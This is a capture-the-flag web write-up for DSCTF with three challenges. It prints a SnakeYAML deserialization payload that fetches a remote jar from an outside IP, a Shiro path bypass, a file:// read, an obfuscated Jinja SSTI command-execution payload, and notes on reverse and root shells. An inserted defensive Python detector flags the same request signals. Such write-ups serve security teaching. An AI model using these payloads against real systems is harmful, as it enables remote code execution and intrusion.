DSCTF web writeup
source link: https://guokeya.github.io/post/q21l4TNA-/
easy_yaml
POST /load/%3b1 HTTP/1.1
Host: 39.105.38.203:30003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
persondata=!!Person
address: {ext: !!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://1.15.67.142:8888/3.jar"]
]]
], isValid: true, street: '1'}
age: '1'
isLogin: true
username: '1'
Try the Shiro authorization bypasses one by one, then load the remote jar.
Command execution gave no response, so read the flag directly.
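Added example (not part of the original writeup): a defender-side check for the two signals visible in the request above, a `;` path parameter hidden behind percent-encoding and explicit `!!` class tags in the YAML form field. The allowlist, the function names and the sample request are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# A tag such as "!!pkg.Class" tells a permissive Java YAML loader to instantiate that class.
GLOBAL_TAG = re.compile(r"!!([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)")

# Assumption: the endpoint only needs the Person bean plus YAML core tags.
ALLOWED_TAGS = {"Person", "str", "int", "float", "bool", "null", "map", "seq"}


def path_findings(raw_path):
    """Return path segments that carry a ';' parameter after percent-decoding."""
    decoded = raw_path
    for _ in range(2):  # second pass catches double encoding such as %253b
        decoded = unquote(decoded)
    return [seg for seg in decoded.split("/") if ";" in seg]


def yaml_tag_findings(body):
    """Return (form field, tag) pairs for explicit tags outside the allowlist."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        for tag in GLOBAL_TAG.findall(value):
            if tag not in ALLOWED_TAGS:
                findings.append((field, tag))
    return findings


def inspect_request(raw_path, body):
    """Combine both checks; empty lists mean nothing was flagged."""
    return {"path": path_findings(raw_path), "yaml": yaml_tag_findings(body)}


# Constructed sample modelled on the request above; the host is a placeholder.
SAMPLE_PATH = "/load/%3b1"
SAMPLE_BODY = (
    "persondata=!!Person\n"
    "address: {ext: !!javax.script.ScriptEngineManager [\n"
    "!!java.net.URLClassLoader [[\n"
    '!!java.net.URL ["http://jar-host.example/x.jar"]\n'
    "]]\n"
    "], isValid: true, street: '1'}\n"
    "username: '1'"
)

if __name__ == "__main__":
    print(inspect_request(SAMPLE_PATH, SAMPLE_BODY))
    print(inspect_request("/load/1", "persondata=username: '1'"))
```

Applications that legitimately use `;jsessionid=` style path parameters would need that case excluded from the path check.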
Pingpingping
%0afile:///app/app.py
Read the source code.
/proc/self/cmdline
Read the secret_key.
Forge with the secret_key for SSTI:
{% print(url_for["__glo""bals__"])["__g""etitem__"]("o""s")["p""open"](url_for["__glo""bals__"]["requ""est"]["args"]["g""et"]("guoke"))["re""ad"]() %}
easy_tou
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
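Get a shell. dpkg shows that samba is installed.
Pop an msf session back, set up the proxy, and try the exploits one by one.
Then pop a root shell back. Use meterpreter to list directories and read files directly.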